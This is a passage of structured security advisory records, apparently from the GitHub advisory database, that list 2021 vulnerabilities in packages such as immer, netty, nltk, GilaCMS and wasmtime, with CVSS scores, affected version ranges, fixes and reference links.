[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'immer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23436'}, {'type': 'WEB', 'url': 'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237'}, {'type': 'PACKAGE', 'url': 'https://github.com/immerjs/immer'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1579266'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IMMER-1540542'}]
{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-02T16:57:31Z', 'nvd_published_at': '2021-09-01T18:15:00Z'}
1.4.0
GHSA-j8wc-gxx9-82hx
2021-10-04T14:16:41Z
2021-09-20T23:18:41Z
null
['CVE-2021-40690']
Exposure of Sensitive Information to an Unauthorized Actor in Apache Santuario
All versions of Apache Santuario - XML Security for Java prior to 2.2.3 and 2.1.7 are vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.santuario:xmlsec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.santuario:xmlsec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.7'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40690'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3b3f5ba9b0de8c9c125077b71af06026d344a709a8ba67db81ee9faa@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r401ecb7274794f040cd757b259ebe3e8c463ae74f7961209ccad3c59@%3Cissues.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8848751b6a5dd78cc9e99d627e74fecfaffdfa1bb615dce827aad633%40%3Cdev.santuario.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a5c0ce9014bd07303aec1e5eed55951704878016465d3dae00e0c28@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9c100d53c84d54cf71975e3f0cfcc2856a8846554a04c99390156ce4@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raf352f95c19c0c4051af3180752cb69acbea88d0d066ab176c6170e8@%3Cuser.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbbbac0759b12472abd0c278d32b5e0867bb21934df8e14e5e641597c@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbdac116aef912b563da54f4c152222c0754e32fb2f785519ac5e059f@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re294cfc61f509512874ea514d8d64fd276253d54ac378ffa7a4880c8@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00015.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5010'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-20T20:24:35Z', 'nvd_published_at': '2021-09-19T18:15:00Z'}
1.4.0
GHSA-2rh5-jvgx-pgw3
2021-09-14T18:35:38Z
2021-09-14T20:25:13Z
null
[]
Any storage file can be downloaded from p.sh if full server path is known
The default configuration for platform.sh (.platform.app.yaml) allows access to uploaded files if you know or can guess their location, regardless of whether roles grant content read access to the content containing those files. If you're using Legacy Bridge, the default configuration also allows access to certain legacy files that should not be readable, including the legacy var directory and extension directories.
[]
[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.24.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.6.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.13.6'}}]
[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform/security/advisories/GHSA-2rh5-jvgx-pgw3'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2021-006-storage-and-legacy-files-accessible-if-path-is-known'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezplatform'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-14T18:35:38Z', 'nvd_published_at': None}
1.4.0
GHSA-f9cv-665r-275h
2021-08-30T19:27:27Z
2021-09-01T18:36:01Z
null
['CVE-2021-23421']
Prototype Pollution in merge-change
All current versions of package merge-change are vulnerable to Prototype Pollution via the utils.set function.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'merge-change'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23421'}, {'type': 'PACKAGE', 'url': 'https://github.com/VladimirShestakov/merge-change'}, {'type': 'WEB', 'url': 'https://github.com/VladimirShestakov/merge-change/blob/9901f145e06158f284f52de42e6ba5b0f702fb65/utils.js#L89-L123'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MERGECHANGE-1310985'}]
{'cwe_ids': ['CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T19:27:27Z', 'nvd_published_at': '2021-08-11T18:15:00Z'}
1.4.0
GHSA-fqr5-qphf-vfr8
2021-09-02T18:52:57Z
2021-09-01T18:37:01Z
null
['CVE-2020-19000']
Cross Site Scripting (XSS) in Simiki
Cross Site Scripting (XSS) in Simiki v1.6.2.1 and prior allows remote attackers to execute arbitrary code via line 54 of the component 'simiki/blob/master/simiki/generators.py'.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'simiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.2.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.6.2.1'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-19000'}, {'type': 'WEB', 'url': 'https://github.com/tankywoo/simiki/issues/123'}, {'type': 'PACKAGE', 'url': 'https://github.com/tankywoo/simiki'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:21:24Z', 'nvd_published_at': '2021-08-27T19:15:00Z'}
1.4.0
GHSA-vrxp-mg9f-hwf3
2021-09-21T21:51:18Z
2021-09-22T20:37:09Z
null
['CVE-2021-41087']
Improperly Implemented path matching for in-toto-golang
### Impact Authenticated attackers posing as functionaries (i.e., within a trusted set of users for a layout) are able to create attestations that may bypass DISALLOW rules in the same layout. An attacker with access to trusted private keys, may issue an attestation that contains a disallowed artifact by including path traversal semantics (e.g., foo vs dir/../foo). ### Patches The problem has been fixed in version 0.3.0. ### Workarounds Exploiting this vulnerability is dependent on the specific policy applied. ### For more information If you have any questions or comments about this advisory: * Open an issue in [in-toto-golang](http://github.com/in-toto/in-toto-golang) * Email us at [in-toto-public](mailto:in-toto-public@googlegroups.com) * If this is a sensitive security-relevant disclosure, please send a PGP encrypted email to santiagotorres@purdue.edu or jcappos@nyu.edu
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/in-toto/in-toto-golang'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.2.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto-golang/security/advisories/GHSA-vrxp-mg9f-hwf3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41087'}, {'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto-golang/commit/f2c57d1e0f15e3ffbeac531829c696b72ecc4290'}, {'type': 'PACKAGE', 'url': 'https://github.com/in-toto/in-toto-golang'}]
{'cwe_ids': ['CWE-22', 'CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-21T21:51:18Z', 'nvd_published_at': '2021-09-21T21:15:00Z'}
1.4.0
GHSA-7vmw-7x57-q6jw
2021-06-25T15:33:55Z
2021-09-08T18:00:00Z
null
['CVE-2021-32713']
Cross-site scripting
Shopware is an open source eCommerce platform. Versions prior to 5.6.10 suffer from an authenticated stored XSS in administration vulnerability. Users are recommend to update to the version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.10'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-f6p7-8xfw-fjqq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32713'}, {'type': 'WEB', 'url': 'https://github.com/shopware/shopware/commit/a0850ffbc6f581a8eb8425cc2bf77a0715e21e12'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:33:55Z', 'nvd_published_at': '2021-06-24T21:15:00Z'}
1.4.0
GHSA-592v-7frm-h44q
2021-07-13T15:53:43Z
2021-09-08T17:25:36Z
null
['CVE-2020-23700']
Cross-site scripting in LavaLite-CMS
Cross Site Scripting (XSS) vulnerability in LavaLite-CMS 5.8.0 via the Menu Links feature.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'lavalite/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.8.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23700'}, {'type': 'WEB', 'url': 'https://github.com/LavaLite/cms/issues/319'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-08T13:53:19Z', 'nvd_published_at': '2021-07-07T19:15:00Z'}
1.4.0
GHSA-x6hx-7gh3-3q98
2021-08-25T18:25:11Z
2021-09-02T17:09:30Z
null
['CVE-2021-23432']
Prototype Pollution in mootools
This affects all versions of package mootools. This is due to the ability to pass untrusted input to Object.merge()
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'mootools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23432'}, {'type': 'PACKAGE', 'url': 'https://github.com/vsviridov/mootools-node'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MOOTOOLS-1325536'}]
{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T18:25:11Z', 'nvd_published_at': '2021-08-24T09:15:00Z'}
1.4.0
GHSA-7vph-p634-vrqf
2021-09-03T20:35:52Z
2021-09-02T17:11:00Z
null
['CVE-2021-38556']
Command Injection in RaspAP 2.6.6
includes/configure_client.php in RaspAP 2.6.6 allows attackers to execute commands via command injection.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'billz/raspap-webgui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38556'}, {'type': 'PACKAGE', 'url': 'https://github.com/RaspAP/raspap-webgui'}, {'type': 'WEB', 'url': 'https://github.com/RaspAP/raspap-webgui/blob/0e1d652c5e55f812aaf2a5908884e9db179416ee/includes/configure_client.php'}, {'type': 'WEB', 'url': 'https://zerosecuritypenetrationtesting.com/?page_id=306'}]
{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T19:47:52Z', 'nvd_published_at': '2021-08-24T13:15:00Z'}
1.4.0
GHSA-9vjp-v76f-g363
2022-02-08T20:35:49Z
2021-09-09T17:11:31Z
null
['CVE-2021-37137']
SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way
### Impact The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. ### Impact All users of SnappyFrameDecoder are affected and so the application may be in risk for a DoS attach due excessive memory usage. ### References https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.68.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37137'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/6da4956b31023ae967451e1d94ff51a746a9194f'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0012/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5316'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-09T14:44:10Z', 'nvd_published_at': '2021-10-19T15:15:00Z'}
1.4.0
GHSA-wwvv-x5mq-h3jj
2021-08-30T20:28:42Z
2021-09-01T18:35:26Z
null
['CVE-2021-3692']
Use of Cryptographically Weak Pseudo-Random Number Generator in yiisoft/yii2-dev
yii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'yiisoft/yii2-dev'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.43'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3692'}, {'type': 'WEB', 'url': 'https://github.com/yiisoft/yii2/commit/13f27e4d920a05d53236139e8b07007acd046a46'}, {'type': 'PACKAGE', 'url': 'https://github.com/yiisoft/yii2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/55517f19-5c28-4db2-8b00-f78f841e8aba'}]
{'cwe_ids': ['CWE-330', 'CWE-338'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T20:28:42Z', 'nvd_published_at': '2021-08-10T17:15:00Z'}
1.4.0
GHSA-h7mq-27r7-w972
2021-10-04T13:56:47Z
2021-09-30T17:13:02Z
null
['CVE-2020-20696']
Cross-site Scripting in GilaCMS
A cross-site scripting (XSS) vulnerability in /admin/content/post of GilaCMS v1.11.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Tags field.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'gilacms/gila'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.11.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20696'}, {'type': 'WEB', 'url': 'https://github.com/GilaCMS/gila/issues/53'}, {'type': 'PACKAGE', 'url': 'https://github.com/GilaCMS/gila'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-29T18:25:04Z', 'nvd_published_at': '2021-09-27T22:15:00Z'}
1.4.0
GHSA-r659-8xfp-j327
2023-09-07T18:40:01Z
2021-09-07T23:09:43Z
null
['CVE-2021-3766']
objection.js Prototype Pollution vulnerability
objection.js prior to version 2.2.16 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). This issue is patched in version 2.2.16.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'objection'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.16'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3766'}, {'type': 'WEB', 'url': 'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9'}, {'type': 'WEB', 'url': 'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/vincit/objection.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c98e0f0e-ebf2-4072-be73-a1848ea031cc'}]
{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T19:01:54Z', 'nvd_published_at': '2021-09-06T12:15:00Z'}
1.4.0
GHSA-hqv3-qq72-78cv
2021-08-25T19:03:15Z
2021-09-02T17:09:40Z
null
['CVE-2021-23430']
Directory Traversal in startserver
All versions of package startserver are vulnerable to Directory Traversal due to missing sanitization.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'startserver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23430'}, {'type': 'PACKAGE', 'url': 'https://github.com/xudafeng/startserver'}, {'type': 'WEB', 'url': 'https://github.com/xudafeng/startserver/blob/bef0c4e4d21da42a40ce87cf25fd54ac8d8cb2d8/lib/index.js%23L71'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-STARTSERVER-1296388'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T19:03:15Z', 'nvd_published_at': '2021-08-24T08:15:00Z'}
1.4.0
GHSA-hwqc-pgjw-vjqp
2021-10-04T13:51:41Z
2021-09-30T17:13:11Z
null
['CVE-2020-20693']
Cross-Site Request Forgery in GilaCMS
A Cross-Site Request Forgery (CSRF) in GilaCMS v1.11.4 allows authenticated attackers to arbitrarily add administrator accounts.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'gilacms/gila'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.11.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20693'}, {'type': 'WEB', 'url': 'https://github.com/GilaCMS/gila/issues/51'}, {'type': 'PACKAGE', 'url': 'https://github.com/GilaCMS/gila'}]
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-29T18:25:09Z', 'nvd_published_at': '2021-09-27T22:15:00Z'}
1.4.0
GHSA-2ww3-fxvq-293j
2023-08-30T22:32:59Z
2021-09-29T17:14:53Z
null
['CVE-2021-3828']
NLTK Vulnerable to REDoS
The nltk package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide as an input to the [`_read_comparison_block()`](https://github.com/nltk/nltk/blob/23f4b1c4b4006b0cb3ec278e801029557cec4e82/nltk/corpus/reader/comparative_sents.py#L259) function in the file `nltk/corpus/reader/comparative_sents.py` may cause an application to consume an excessive amount of CPU.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'nltk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3828'}, {'type': 'WEB', 'url': 'https://github.com/nltk/nltk/pull/2816'}, {'type': 'WEB', 'url': 'https://github.com/nltk/nltk/commit/277711ab1dec729e626b27aab6fa35ea5efbd7e6'}, {'type': 'PACKAGE', 'url': 'https://github.com/nltk/nltk'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d19aed43-75bc-4a03-91a0-4d0bb516bc32'}]
{'cwe_ids': ['CWE-1333', 'CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T20:49:37Z', 'nvd_published_at': '2021-09-27T13:15:00Z'}
1.4.0
GHSA-v4cp-h94r-m7xf
2021-09-17T20:05:21Z
2021-09-20T19:54:05Z
null
['CVE-2021-39216']
Use after free passing `externref`s to Wasm in Wasmtime
### Impact There was a use-after-free bug when passing `externref`s from the host to guest Wasm content. To trigger the bug, you have to explicitly pass multiple `externref`s from the host to a Wasm instance at the same time, either by * passing multiple `externref`s as arguments from host code to a Wasm function, * or returning multiple `externref`s to Wasm from a multi-value return function defined in the host. If you do not have host code that matches one of these shapes, then you are not impacted. If Wasmtime's [`VMExternRefActivationsTable`](https://github.com/bytecodealliance/wasmtime/blob/37c094faf53f1b356aab3c79d451395e4f7edb34/crates/runtime/src/externref.rs#L493) became filled to capacity after passing the first `externref` in, then passing in the second `externref` could trigger a garbage collection. However the first `externref` is not rooted until we pass control to Wasm, and therefore could be reclaimed by the collector if nothing else was holding a reference to it or otherwise keeping it alive. Then, when control was passed to Wasm after the garbage collection, Wasm could use the first `externref`, which at this point has already been freed. We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare. ### Patches The bug has been fixed, and users should upgrade to Wasmtime 0.30.0. Additionally, we have updated [our primary `externref` fuzz target](https://github.com/bytecodealliance/wasmtime/blob/37c094faf53f1b356aab3c79d451395e4f7edb34/fuzz/fuzz_targets/table_ops.rs) such that it better exercises these code paths and we can have greater confidence in their correctness going forward. ### Workarounds If you cannot upgrade Wasmtime yet, you can avoid the bug by disabling reference types support in Wasmtime by passing `false` to [`wasmtime::Config::wasm_reference_types`](https://docs.rs/wasmtime/0.29.0/wasmtime/struct.Config.html#method.wasm_reference_types). ### References * [The reference types Wasm proposal, which introduces `externref`](https://github.com/WebAssembly/reference-types/) ### For more information If you have any questions or comments about this advisory: * Reach out to us on [the Bytecode Alliance Zulip chat](https://bytecodealliance.zulipchat.com/#narrow/stream/217126-wasmtime) * Open an issue in [the `bytecodealliance/wasmtime` repository](https://github.com/bytecodealliance/wasmtime/)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'wasmtime'}, 'ecosystem_specific': {'affected_functions': ['wasmtime::Linker::func_new', 'wasmtime::Linker::func_wrap', 'wasmtime::Store::gc']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.30.0'}]}]}]
